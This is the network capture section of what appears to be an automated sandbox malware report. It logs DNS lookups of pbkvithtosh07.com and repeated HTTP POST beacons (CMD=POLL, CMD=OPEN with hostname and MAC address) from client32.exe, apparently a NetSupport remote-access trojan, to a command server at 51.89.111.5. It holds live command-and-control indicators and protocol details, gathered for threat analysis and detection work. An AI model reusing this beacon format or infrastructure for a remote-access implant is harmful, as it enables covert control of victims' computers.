Nov 1, 2024 18:14:08.579200983 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.674247026 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.679222107 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.774347067 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.781955004 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.849749088 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:08.850667953 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.850667953 CET	49976	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:08.855531931 CET	1771	49976	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:39.360322952 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:39.410108089 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:39.410242081 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:39.414258003 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:39.430006981 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:44.417388916 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:44.422267914 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:44.518405914 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:44.523284912 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:44.618662119 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:44.623713017 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:44.719432116 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:44.724307060 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:44.820115089 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:44.825846910 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:44.920350075 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:44.928544998 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.022902012 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.028033018 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.121438026 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.126802921 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.222671032 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.227672100 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.322478056 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.327776909 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.422523022 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.427495003 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.526509047 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.532968998 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.624412060 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.629373074 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.728343964 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.733679056 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.824934959 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.829911947 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:45.925430059 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:45.930874109 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.025465012 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.030440092 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.125489950 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.136209011 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.326520920 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.332139969 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.686445951 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.691719055 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.786423922 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.791764021 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.886471033 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.891977072 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:46.988358974 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:46.993968010 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:47.088463068 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.094166040 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:47.189429045 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.194765091 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:47.290441990 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.389476061 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.490432978 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.504559994 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.590512037 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.691437006 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.793597937 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:47.808433056 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:48.342421055 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.342489958 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:48.342581034 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.342628956 CET	49977	1771	192.168.2.7	51.89.111.5
Nov 1, 2024 18:14:48.342828035 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.342838049 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.342848063 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.344681025 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.345165014 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.345175982 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.345184088 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.345809937 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.349375963 CET	1771	49977	51.89.111.5	192.168.2.7
Nov 1, 2024 18:14:48.349390984 CET	1771	49977	51.89.111.5	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 18:11:05.552392006 CET	55779	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:11:05.710354090 CET	53	55779	1.1.1.1	192.168.2.7
Nov 1, 2024 18:11:06.155489922 CET	61288	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:11:06.165287018 CET	53	61288	1.1.1.1	192.168.2.7
Nov 1, 2024 18:12:01.696290016 CET	60670	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:12:02.006411076 CET	53	60670	1.1.1.1	192.168.2.7
Nov 1, 2024 18:12:40.827343941 CET	61786	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:12:41.822643042 CET	53	61786	1.1.1.1	192.168.2.7
Nov 1, 2024 18:13:20.830710888 CET	62281	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:13:21.155447006 CET	53	62281	1.1.1.1	192.168.2.7
Nov 1, 2024 18:14:00.014039040 CET	54299	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:14:00.331142902 CET	53	54299	1.1.1.1	192.168.2.7
Nov 1, 2024 18:14:39.070131063 CET	59846	53	192.168.2.7	1.1.1.1
Nov 1, 2024 18:14:39.357215881 CET	53	59846	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 18:11:05.552392006 CET	192.168.2.7	1.1.1.1	0x9700	Standard query (0)	pbkvithtosh07.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:11:06.155489922 CET	192.168.2.7	1.1.1.1	0xea66	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:12:01.696290016 CET	192.168.2.7	1.1.1.1	0x3d6a	Standard query (0)	pbkvithtosh07.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:12:40.827343941 CET	192.168.2.7	1.1.1.1	0x9fd7	Standard query (0)	pbkvithtosh07.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:13:20.830710888 CET	192.168.2.7	1.1.1.1	0xa905	Standard query (0)	pbkvithtosh07.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:14:00.014039040 CET	192.168.2.7	1.1.1.1	0xd268	Standard query (0)	pbkvithtosh07.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:14:39.070131063 CET	192.168.2.7	1.1.1.1	0xb655	Standard query (0)	pbkvithtosh07.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 18:11:05.710354090 CET	1.1.1.1	192.168.2.7	0x9700	No error (0)	pbkvithtosh07.com	51.89.111.5	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:11:06.165287018 CET	1.1.1.1	192.168.2.7	0xea66	No error (0)	geo.netsupportsoftware.com	104.26.0.231	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:11:06.165287018 CET	1.1.1.1	192.168.2.7	0xea66	No error (0)	geo.netsupportsoftware.com	104.26.1.231	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:11:06.165287018 CET	1.1.1.1	192.168.2.7	0xea66	No error (0)	geo.netsupportsoftware.com	172.67.68.212	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:12:02.006411076 CET	1.1.1.1	192.168.2.7	0x3d6a	No error (0)	pbkvithtosh07.com	51.89.111.5	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:12:41.822643042 CET	1.1.1.1	192.168.2.7	0x9fd7	No error (0)	pbkvithtosh07.com	51.89.111.5	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:13:21.155447006 CET	1.1.1.1	192.168.2.7	0xa905	No error (0)	pbkvithtosh07.com	51.89.111.5	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:14:00.331142902 CET	1.1.1.1	192.168.2.7	0xd268	No error (0)	pbkvithtosh07.com	51.89.111.5	A (IP address)	IN (0x0001)	false
Nov 1, 2024 18:14:39.357215881 CET	1.1.1.1	192.168.2.7	0xb655	No error (0)	pbkvithtosh07.com	51.89.111.5	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

51.89.111.5connection: keep-alivecmd=pollinfo=1ack=1

geo.netsupportsoftware.com

51.89.111.5connection: keep-alivecmd=openclient_version=1.0protocol_ver=1.1maxpacket=928client_name=124406client_addr=>192.168.2.7port=5405hostname=124406macaddress=ecf4bb82f7e0gsk=odyvxtzr7zqv7l)yd6suoqaacmpi=60apptype=0dept=

51.89.111.5connection: keep-alivecmd=poll

51.89.111.5connection: keep-alivecmd=pollpost 51.89.111.5

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49700	51.89.111.5	1771	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:11:05.881328106 CET	214	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Nov 1, 2024 18:11:10.929682016 CET	398	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT= Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49701	104.26.0.231	80	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:11:06.227611065 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 1, 2024 18:11:07.200016022 CET	782	IN	HTTP/1.1 200 OK Date: Fri, 01 Nov 2024 17:11:07 GMT Content-Type: text/html; Charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8dbd808b1924e9b1-DFW CF-Cache-Status: DYNAMIC Access-Control-Allow-Origin: * Cache-Control: private Set-Cookie: ASPSESSIONIDACBSDDAB=LJPDEFECAHKGFGCMGEAIMPJL; path=/ cf-apo-via: origin,host X-Frame-Options: SAMEORIGIN X-Powered-By: ASP.NET Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v%2BJfwa2wX%2FditrhsXZkr77Ahod0p8AVkPHWhTkK6Y42OKt5pJtcx4rcSXb1DC6zqAtVGy2khJPlv4hOEB09nafCHGT1DkTBLPXpJYBG9KBBRTyxNjhc2KuZg3DQ7edLbroigHU9J0uaj4fqK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare Data Raw: 66 0d 0a 33 32 2e 37 37 36 37 2c 2d 39 36 2e 37 39 37 0d 0a 30 0d 0a 0d 0a Data Ascii: f32.7767,-96.7970

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49965	51.89.111.5	1771	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:12:02.060532093 CET	214	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Nov 1, 2024 18:12:07.062630892 CET	398	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT= Data Raw: Data Ascii:
Nov 1, 2024 18:12:07.565834999 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:07.666639090 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:07.767875910 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:07.867640018 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:07.968070030 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.068758965 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.169632912 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.270929098 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.370930910 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.471610069 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.572648048 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.673635006 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.774612904 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.874877930 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:08.974634886 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.075634956 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.176646948 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.281071901 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.381700039 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.482635975 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.583616972 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.684639931 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.784630060 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.884648085 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:09.984805107 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:10.085639954 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:10.185729980 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:10.286663055 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:10.387661934 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:10.488636971 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49974	51.89.111.5	1771	6276	C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 18:12:41.879384995 CET	214	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 51.89.111.5Connection: Keep-AliveCMD=POLLINFO=1ACK=1 Data Raw: Data Ascii:
Nov 1, 2024 18:12:46.884069920 CET	398	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 206Host: 51.89.111.5Connection: Keep-AliveCMD=OPENCLIENT_VERSION=1.0PROTOCOL_VER=1.1MAXPACKET=928CLIENT_NAME=124406CLIENT_ADDR=>192.168.2.7PORT=5405HOSTNAME=124406MACADDRESS=ECF4BB82F7E0GSK=ODyvxTzr7zqv7L)yd6sUoQAACMPI=60APPTYPE=0DEPT= Data Raw: Data Ascii:
Nov 1, 2024 18:12:46.984056950 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.084059000 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.181869984 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.284069061 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.382838964 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.484065056 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.583843946 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.683820009 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.784827948 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.884865046 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:47.986231089 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.086827040 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
Nov 1, 2024 18:12:48.186856985 CET	201	OUT	POST http://51.89.111.5/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 9Host: 51.89.111.5Connection: Keep-AliveCMD=POLL Data Raw: Data Ascii:
